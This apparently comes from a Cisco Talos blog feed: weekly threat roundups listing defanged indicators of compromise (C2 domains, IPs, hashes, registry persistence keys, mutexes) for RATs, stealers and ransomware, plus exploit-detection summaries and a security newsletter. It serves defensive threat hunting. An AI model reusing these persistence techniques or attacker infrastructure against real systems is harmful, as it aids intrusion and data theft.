<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: HE8MRP3X92SVO	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: HE8MRP3X92SVO	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: HE8MRP3X92SVO	1

Mutexes	Occurrences
<random, matching [a-zA-Z0-9]{5,9}>	7
HCQZLMB9VOLD	1
1HZYRMUIRQ	1
REYUIW9NA8LY	1
bv1lr78956835	1
MUA192KRR0N	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
172[.]217[.]11[.]46	2
172[.]217[.]9[.]206	2
188[.]138[.]114[.]61	1
178[.]128[.]111[.]183	1
77[.]79[.]13[.]204	1
195[.]201[.]196[.]115	1

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
www[.]altervista[.]org	1
divine-vps[.]com	1
moddersondazone[.]net	1
khant[.]info	1
applesupportforums[.]com	1
underground-logs[.]tk	1
www[.]emmek[.]altervista[.]org	1
khant[.]me	1
imscuh[.]com	1
rtrforums[.]com	1
tripsschool[.]netfirms[.]com	1

Files and or directories created	Occurrences
%TEMP%\windefender.exe.jpg	6
%TEMP%\update.exe.jpg	1
%TEMP%\8c5gucto.exe.jpg	1
%TEMP%\f5qrnr2jfk.exe.jpg	1
%TEMP%\52qof1hoy2.exe.jpg	1
%TEMP%\dvpiit26.exe.jpg	1
%TEMP%\windefender.jpg	1

File Hashes

171ab79cd58e2be6aeada2c137c8ab74eecf082ae2a80358e84fccd254bf760b 312b904aa6b90418558a7e9b8d25ad1f84a2ae413e542fb6a06b7aae9567957d 39154850d888f42f4a04fc19887691101aadda306311605b59aa0997ae9fd4cc 3bd1ed52b57837cbc2b072c23f9de501a7d0ed5bd3ce93d3ca7022aada5ea13f 4ca9d8cd2b950485301fb885cc1d954e7c91c03c4fd21209fe90d68426a0b073 594e3dde160ff061cabb630e7c6d8c9584e45f61bc446b03e3546d2104b25d1a 59656eb7ffde7b461f49735aa9717ab09ff883780522afa1de8d724928108b75 80f8410a8f0042edad98dc1636d6cbd6c989d5159454d86fc212eb647d413850 87a2371dc38ca7b11010496c3e4c908379596ddbd5b2eb0332817a8d18e71ea0 a92e67a93899f548c68b5d667650b0749a7ff56799ba7afd5d393bef97f946a5 e487727b0d5121e8efc6f51ffe24ce54e40f923b0d9916284b988efc4a57269e eb03d095df6d765469d088cefbd320b6cee40bc97cf1bd75ad46a115f2d3697b

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security	N/A
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella
WSA

Screenshots of Detection

ThreatGrid

---

Win.Trojan.XpertRAT-7550253-1

Indicators of Compromise

Registry Keys	Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: EnableLUA	13
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: UACDisableNotify	13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\X	13
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN	13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5	13
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5	13
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5	13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\X\RUN	13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\X\RUN Value Name: NOME	13

Mutexes	Occurrences
P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5	13

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
joeing[.]dnsfor[.]me	13

Files and or directories created	Occurrences
%TEMP%\Administrator.bmp	13
%APPDATA%\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5	13
%APPDATA%\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5	13
%APPDATA%\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe	13
%APPDATA%\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\ut	13
%TEMP%\Westminster8.exe	13

File Hashes

2bc7aa28fb4cab2aa55e683fa452125a29fdeaf2c8a8ad09801581ac164f6e04 33151408dca938762e705906a4da851f01d38e05ea539bc4a6b56745d1464933 3464a96f3efe37c2c852c581576c75b5f7fce51e06473317e3a927867959cd9e 395a63b07a1275522ed8867d6402abba3b81bfcafedfdd4cc42d9d7b12b03868 45df177c92177a1766adb8e57b49b588f80d5534a84f0fc91d3ce296c7793052 75dc81fe9a84e7abecc35834a59574fa6975df9dafede10ec32090c054b2a7e4 8cd515edb041f9591d71885cf5e51253f9c0569fcfae06a73e14dbfef7d6f5ef 964354f86010cf35a07fc0e8ac11c0e653409338c42cfc132d8876b0fc64d3e7 a78e29a18072a0287261c696aac850b3a2f67087e1167f7b867eff84075655ab ab4e72ae86ecc5ec5fd7fe5e727ebc069c4803fd34e975c6054fa85cf4a73f8a af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856 ce56803cae1069908fc47087d6d8fbd1278ae72bc36966694e35da564822446e dc5771d054a00e41f0cceb59ab59bf154b5e56d6fbff9db7a2713a5728254bbb

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security	N/A
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA	N/A

Screenshots of Detection

AMP

ThreatGrid

---

Win.Trojan.Upatre-7549404-0

Indicators of Compromise

Registry Keys	Occurrences
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: a2fc9eb	8

Mutexes	Occurrences
qazwsxedc	9
Local\MSCTF.Asm.Mutexsssssssssssss1	8
Local\MSCTF.CtfMonitorInstMutexsssssssssssss1	8
Global\b54c4621-3b1b-11ea-a007-00501e3ae7b5	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
93[.]118[.]36[.]235	8
197[.]255[.]147[.]146	8
136[.]243[.]69[.]220	8
81[.]169[.]145[.]67	8
178[.]254[.]50[.]156	8
202[.]172[.]26[.]26	8
134[.]0[.]11[.]125	8
157[.]7[.]107[.]174	8
213[.]186[.]33[.]3	7
46[.]105[.]57[.]169	7
166[.]62[.]113[.]120	7
46[.]30[.]215[.]33	7
212[.]48[.]68[.]63	7
208[.]117[.]38[.]143	7
5[.]39[.]73[.]158	7
3[.]114[.]58[.]184	6
37[.]58[.]63[.]231	6
81[.]19[.]159[.]64	6
198[.]199[.]67[.]86	6
185[.]227[.]80[.]58	6
211[.]1[.]226[.]76	3
192[.]35[.]177[.]64	2
203[.]189[.]109[.]240	2
213[.]186[.]33[.]87	1
46[.]166[.]187[.]64	1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
schema[.]org	8
api[.]w[.]org	8
gmpg[.]org	8
recaswine[.]ro	8
pendletonforhouse[.]com	8
ecocalsots[.]com	8
www[.]riesa[.]de	8
gestes-argile[.]com	8
feuerwehr-stadt-riesa[.]de	8
treatneuro[.]com	8
national-drafting[.]com	8
dupdiesel[.]co[.]za	8
has-gulvakfi[.]com	8
domaine-cassillac[.]com	8
cerenalarmkamera[.]com	8
definitionen[.]de	8
eatside[.]es	8
takatei[.]com	8
www[.]takatei[.]com	8
themeisle[.]com	7
www[.]ovh[.]co[.]uk	7
plexipr[.]com	7
paintituppottery[.]com	7
viralcrazies[.]com	7
camlavabolari[.]com	7

*See JSON for more IOCs

Files and or directories created	Occurrences
%HOMEPATH%\Start Menu\Programs\Startupx\system.pif	8
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startupx\system.pif	8
%APPDATA%\a2fc9eb	8
%APPDATA%\a2fc9eb\ea2fc9.exe	8
%APPDATA%\8ddb21f\88ddb2.exe	5
%HOMEPATH%\HELP_FILE_430D48DC3.png	1
%HOMEPATH%\HELP_FILE_530D48DC3.html	1
%HOMEPATH%\HELP_FILE_530D48DC3.png	1
%HOMEPATH%\HELP_FILE_630D48DC3.html	1
%HOMEPATH%\HELP_FILE_630D48DC3.png	1
%HOMEPATH%\HELP_FILE_730D48DC3.html	1
%HOMEPATH%\HELP_FILE_730D48DC3.png	1
%HOMEPATH%\HELP_FILE_830D48DC3.html	1
%HOMEPATH%\HELP_FILE_830D48DC3.png	1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_130D48DC3.html	1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_130D48DC3.png	1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_230D48DC3.html	1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_230D48DC3.png	1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_330D48DC3.html	1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_330D48DC3.png	1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_430D48DC3.html	1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_430D48DC3.png	1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_530D48DC3.html	1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_530D48DC3.png	1
%HOMEPATH%\Local Settings\Application Data\HELP_FILE_630D48DC3.html	1

*See JSON for more IOCs

File Hashes

04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96 434ff7bfd6a752f3c56c20d8a7e8853a94e99be9d112442eed257ee42800e957 49a97e5e68d188e423af3eebe2b3a62d2a285006d42c5dfd10cfdbe534534c91 61e76a0e801cb7a30221f4075ec8c5fc733cc7b3d5bda520551b8bd053f101d2 8f237cc28360ef130227b92323a986c3136242600fc2188b92c48fad5df2f7fe 98db4c353cc79a3b9bfae516ab56fab19166d2fed1f108cbff33447cc2feac33 a27d8ad3e0ef1d792cc6504a41d3eaecf11802d03fdbfb08c811217759f2d965 de940e24beca778c6d8afd8b625eeaff0549342ce061fd75ce817d2d5add612c e67b98c9041d13d17904f65f875e840c7f40cbf60fdc25c0767fefc5c57cb634 eccb6d79ce6669a5e4fb1f394f920224fe40d0dd782c8dd12cf4004c81c32765

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella
WSA

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Packed.Passwordstealera-7544289-0

Indicators of Compromise

Registry Keys	Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Quasar Client Startup	12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: java	4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Java	4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: error pending	2
<HKCR>\LOCAL SETTINGS\MUICACHE\\52C64B7E Value Name: LanguageList	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Windows startup	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: NET framework	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: steam	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\\WINDOWS Value Name: Id	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\\WINDOWS Value Name: Index	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: NvDisplay	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Windows Defender	1

Mutexes	Occurrences
SwHHcMzPFPnmaghyKW	2
ymJAxrWzIz9Lmt1RL3	2
UuCyPSySUiFSDdHPtO	2
sFWQsTLv8c5vk4jyO0	1
tsgtBnaQMyDFZrUQIp	1
YsyBq3MBwCzQNk2qhM	1
q624fQPLA3sreuCLzt	1
N3og1f8lHLVNu6W30c	1
KckvHhqL1uihc4dCLw	1
RTzXcJcD26j9cGndLe	1
9uxtMjacj46ojfxw8Z	1
tmiYIVMkI1dD9zfRjT	1
hI0uR11aF8XGlij0wp	1
fJO2dbxEGn2ZNnVHEj	1
zqUBYqdAinRE5xYguS	1
RtX4BZD2nWkVu0prSe	1
HjjzZQZESOkAInyZch	1
cP20H0tkmTiytEkIEL	1
ixlUgkBMIocn8A96xU	1
yIKLaGMppBM6EDhhvU	1
mLvIMV7J1hOyksFGvj	1
hj0AV9bM5BIleznxOc	1
UQjK2wv6weKFSvAPxM	1
UrlxbiSJX7lUOpSRZs	1
JsMa39ctmfwcdenPhN	1

*See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
208[.]95[.]112[.]1	52
37[.]8[.]73[.]90	2
192[.]69[.]169[.]25	1
103[.]43[.]75[.]105	1
3[.]14[.]212[.]173	1
3[.]19[.]114[.]185	1
18[.]188[.]14[.]65	1
103[.]136[.]43[.]131	1
103[.]73[.]67[.]70	1
74[.]118[.]139[.]67	1
213[.]183[.]58[.]52	1
141[.]255[.]158[.]23	1
80[.]66[.]255[.]129	1
95[.]59[.]113[.]113	1
109[.]230[.]215[.]181	1
185[.]248[.]100[.]84	1
95[.]156[.]232[.]34	1
88[.]150[.]227[.]112	1
23[.]249[.]161[.]111	1
36[.]84[.]57[.]230	1
36[.]84[.]56[.]39	1

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
ip-api[.]com	52
swez111[.]ddns[.]net	5
scammer[.]chickenkiller[.]com	2
holaholahola[.]hopto[.]org	2
chrome[.]giize[.]com	2
niroshimax[.]zapto[.]org	2
0[.]tcp[.]ngrok[.]io	1
gingles[.]ddns[.]net	1
dhayan[.]ddns[.]net	1
sanchosec[.]ddns[.]net	1
apina123[.]duckdns[.]org	1
mlks[.]ddns[.]net	1
update1337[.]duckdns[.]org	1
ord	1
dike[.]duckdns[.]org	1
nirovitch[.]zapto[.]org	1
nume123[.]hopto[.]org	1
pilnaspuodas[.]ddns[.]net	1
danek56[.]ddns[.]net	1
windows13467[.]ddns[.]net	1
backtofuture[.]zapto[.]org	1
nerdicon[.]ddns[.]net	1

Files and or directories created	Occurrences
%APPDATA%\Logs	35
%APPDATA%\Logs\01-17-2020	35
%APPDATA%\SubDir	28
%System32%\Tasks\WINDOWSSYSTEMHOST	22
%APPDATA%\SubDir\Client.exe	18
%System32%\Tasks\Quasar Client Startup	8
%APPDATA%\<random, matching '[A-Z][a-z]{3,5}\[a-z]{4,6}'>.exe	8
E:\autorun.inf	7
\autorun.inf	7
%System32%\Tasks\java	4
%APPDATA%\<random, matching '[a-z0-9]{3,7}'>	4
%APPDATA%\SubDir\WinUpdate.exe	2
%SystemRoot%\SysWOW64\java64	2
%SystemRoot%\SysWOW64\java64\java.exe	2
%System32%\Tasks\error pending	2
%APPDATA%\SubDir\fileintl.exe	2
%System32%\Tasks\Windows Defender	1
%System32%\Tasks\Windows	1
%System32%\Tasks\Windows startup	1
%System32%\Tasks\WinSql	1
%APPDATA%\SubDir\WinSql1.exe	1
%System32%\Tasks\NET framework	1
%ProgramFiles(x86)%\SubDir	1
%ProgramFiles(x86)%\SubDir\Client.exe	1
%System32%\Tasks\RDPBlox Agent	1

*See JSON for more IOCs

File Hashes

02c9df3dec221cacfa6c97e91bee174af3022dac4588e3f494108b0cc5c9fe1e 03fa8b9de359535afb3af2914e2bd91d630b85a0596604501968b12f9187b1da 0624f9670f56e83ab5bbdf903879ffd0facb5b27b4bc53d16f5d4a560033cdf8 0668b26c7ab4e7adbdf98d515b0a58ae06f5e89d67e5c9fa02a9ee7bea8a477a 09666ba370e36246342d7093b6c63b5a8ef10966fa78b79bcf570659a0dd2f77 0c598a620e83a6e0ee892aa5090e2dbbf36dde886620647be8c27bab0b94859e 0ed3feae6696b3986ae492d85fef56e2ec226d7b010154470b433bfc357f861b 189c7ebae4cdd338f844ba5adc3ecc322294a7be438a3a72eea69468ac068eb3 192a0440574068fd9297086e0cf05a57d8ae4af03045d6be4c0b4f21bd636a72 19b8ed7ab551d89467c665ee7f509fe3ece9101679b5302cdc70c6d3a8c12ee6 26f294e691ec271d761a167704d495ca8bdc4d66cb0cd332a0e49313164988b1 27473eaee1e66c3a9581d17b4ff94d481c31f23032b810493d99a23eebee6b22 29f55d706d0e7390d7e77aceae79909654b4868179ff6913f28d78df945a5a51 2b3eb6cf09691b169c603cbeba508c4056eb6c8d1f12abe11b3c11c77b130604 2d3cef89943a95c57418be1996431f9803c6df4a9307d1890a3885c8794986af 3068250bcb0e8ffcee254c2da91e2696703bf36cfb195415aa3b0c454601dad1 3204ad689f3939402dae9670970c55c684b559ce1a8ba5726eb3e143a0beea4a 3622a2b3adfc7cbc7727a7a13dc6c895290c6f6fc93c8e64e753e2041cafed16 362ec0bc0738f083dcdbf9472ebf4e6227b33d093c9dacf1093607fa3b53ea01 38c56bc6885e546caab8faa8f9b75a6b1d82a60f686038ccaf72f148187fb1ee 3baa2fb31a69683a134a24d5a5a05aa1619ce65ba9811e34d254a5efd708580c 42ee0201d3a74bf465daef9178042cc7fb28bab5b932e6d7a865cbc11fce6c94 472736830d9114c83bad680bc95c138d3951213d1429e314749b18083ac5cdf2 4d583b00c74ef261c7c20e53563b521ddda7b85bf5b1ac98463af0c6488a55d0 54b3c135aa1fe9b870209d36e286df1d7dc4e6182b664285f3564c573dbbdc89

*See JSON for more IOCs

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA

Screenshots of Detection

AMP

ThreatGrid

---

Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

CVE-2019-0708 detected - (8483)

An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.

Atom Bombing code injection technique detected - (795)

A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.

Excessively long PowerShell command detected - (576)

A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.

Process hollowing detected - (288)

Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.

Kovter injection detected - (264)

A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

Gamarue malware detected - (193)

Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

Installcore adware detected - (90)

Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.

Dealply adware detected - (61)

DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.

Reverse tcp payload detected - (13)

An exploit payload intended to connect back to an attacker controlled host using tcp has been detected.

WinExec payload detected - (13)

An exploit payload intended to execute commands on an attacker controlled host using WinExec has been detected.

---

Threat Source newsletter (Jan. 30, 2020)

January 30, 2020, 11:00 am

≫ Next: Threat Roundup for January 24 to January 31

≪ Previous: Threat Roundup for January 17 to January 24

$

0

0

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

Be sure to pay close attention Tuesday for some changes we have coming to Snort.org. We’ll spare you the details for now, but please bear with us if the search function isn’t working correctly for you or you see anything else wonky on the site.

And, as always, we have the latest Threat Roundup where we go through the top threats we saw — and blocked — over the past week.

Upcoming public engagements

Event: A World of Threats: When DNS becomes the new weapon for governments at Swiss Cyber Security Days 
Location: Forum Fribourg, Granges-Paccot, Switzerland
Date: Feb. 12 - 13
Speakers: Paul Rascagnères
Synopsis: In this presentation, Paul will present two threat actors Cisco Talos has been tracking who are manipulating the DNS system. On Jan. 22, 2019, the U.S. DHS published a directive concerning this attack vector. We will present the timeline for these events and their technical details. One of the actors is behind the campaign we named “Sea Turtle.” This actor is more advanced and more aggressive than others we’ve observed in the past. They do not hesitate to directly target registrars and one registry. The talk will break down these two actors and the methodology used to target the victims.

Cyber Security Week in Review

• State-sponsored actors linked to Turkey are believed to be behind a recent wave of cyber attacks targeting governments in the Middle East and Asia. The attackers are using a technique called DNS hijacking that shows similarities to the Sea Turtle actor Cisco Talos discovered last year. 
• Facebook executives backed the security of its WhatsApp messaging software, saying it could not have been at fault for the hacking of Amazon CEO Jeff Bezos’ phone. Reports state Bezos was sent a malicious video through WhatsApp and opened it, leading to the installation of spyware. However, Facebook laid the blame at the feet of Apple and iOS’ security. 
• The Bezos incident has led to many wealthy individuals reaching out to cyber security vendors for private assistance with security. For example, one group is working on an information-sharing platform for cyber attacks targeting members of royal families across the globe. 
• Dozens of United Nations servers and user accounts were breached during an August cyber attack, according to new leaked reports. Staff members working in the UN’s Geneva, Switzerland office were reportedly told to change their passwords but were not made aware of the breach. 
• The Japanese government adopted a series of new policies this week designed to protect government services from a cyber attack during the upcoming Summer Olympics. A special panel called on infrastructure and public transportation services to investigate any potential vulnerabilities in their systems due to the use of internet-of-things devices, and report those flaws immediately to an administrator. 
• Cisco launched a new security architecture platform for IoT devices this week. Cisco Cyber Vision provides users with software and services backed by Talos’ intelligence to identify threats and vulnerabilities in IoT assets in real-time. 
• Facebook agreed to pay $550 million as part of a settlement of a class-action lawsuit in Illinois. The suit alleged Facebook violated a state law by using facial recognition technology to auto-tag users in photos without obtaining their consent. 
• The actor behind the Maze ransomware dumped a large amount of victim data online this week, including information from an Ohio community college and a grocery store chain in Michigan. Administrators of Maze’s website said in a message that they were sparing recent victim Parkland, Florida, but still leaked some data to prove that they were hacked. 
• The latest security update to iOS allows users to disable a location-tracking feature used by many apps. The latest patches also fixed a critical remote code execution vulnerability in the WebKit browsing engine. 

Notable recent security issues

Title: Cisco urging users to update Firepower Management Center immediately to fix severe bug
Description: Cisco disclosed a high-severity vulnerability in its Firepower Management Center last week that could allow an attacker to bypass the usual authentication steps. The vulnerability — which was assigned a 9.8 severity score out of 10 — exists in the way Firepower handles LDAP authentication responses from an external authentication server. An attacker could exploit this flaw by sending a specially crafted HTTP request to the device. Users are also encouraged to turn off LDAP configuration on their devices. Cisco also disclosed seven high-severity flaws and 19 medium-severity security issues in some of its other products, including Smart Software Manager.
Snort SIDs: 52627 – 52632, 52641 - 52646

Title: Exploitation of Citrix vulnerability spikes after POC released, patches followed
Description: Citrix rushed out a patch for its Application Delivery Controller (ADC) and Citrix Gateway products after proof of concept code leaked for a major vulnerability. The company first disclosed CVE-2019-19781 in December, saying a patch was forthcoming. But security researchers have noticed an uptick in exploitation attacks, forcing Citrix to move up its timeline.
Snort SIDs: 52620

Most prevalent malware files this week

SHA 256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
MD5: 8c80dd97c37525927c1e549cb59bcbf3
Typical Filename: eternalblue-2.2.0.exe
Claimed Product: N/A
Detection Name: W32.85B936960F.5A5226262.auto.Talos

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94 
MD5: 7c38a43d2ed9af80932749f6e80fea6f
Typical Filename: xme64-520.exe
Claimed Product: N/A 
Detection Name: PUA.Win.File.Coinminer::1201

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258 
MD5: a917d39a8ef125300f2f38ff1d1ab0db
Typical Filename: FFChromeSetters
Claimed Product: N/A
Detection Name: PUA.Osx.Adware.Macsearch::agent.tht.talos

Keep up with all things Talos by following us on Twitter. Snort, ClamAV and Immunet also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here (as well as on your favorite podcast app). And, if you’re not already, you can also subscribe to the weekly Threat Source newsletter here.  

Threat Roundup for January 24 to January 31

January 31, 2020, 12:51 pm

≫ Next: Beers with Talos Ep. #71: I Have the Power(Shell)

≪ Previous: Threat Source newsletter (Jan. 30, 2020)

$

0

0

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 24 and Jan. 31. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.


For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
The most prevalent threats highlighted in this roundup are:

Threat Name	Type	Description
Doc.Downloader.Emotet-7561073-0	Downloader	Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Ransomware.TeslaCrypt-7561199-1	Ransomware	TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily.
Win.Malware.Cerber-7561026-0	Malware	Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns other file extensions are used.
Win.Packed.njRAT-7561028-1	Packed	njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
Win.Packed.Kuluoz-7561668-1	Packed	Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Trojan.SmokeLoader-7562031-1	Trojan	SmokeLoader is malware primarily used to download and execute additional malware. Read more about this threat on our blog at https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html.
Win.Malware.Nymaim-7565328-1	Malware	Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Packed.ZBot-7563206-1	Packed	Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods like key-logging and form-grabbing.
PUA.Win.File.Dealply-7563212-0	File	DealPly is an adware program that installs an add-on for web browsers and displays malicious ads.

---

Threat Breakdown

Doc.Downloader.Emotet-7561073-0

Indicators of Compromise

Registry Keys	Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID	5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: Type	5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: Start	5
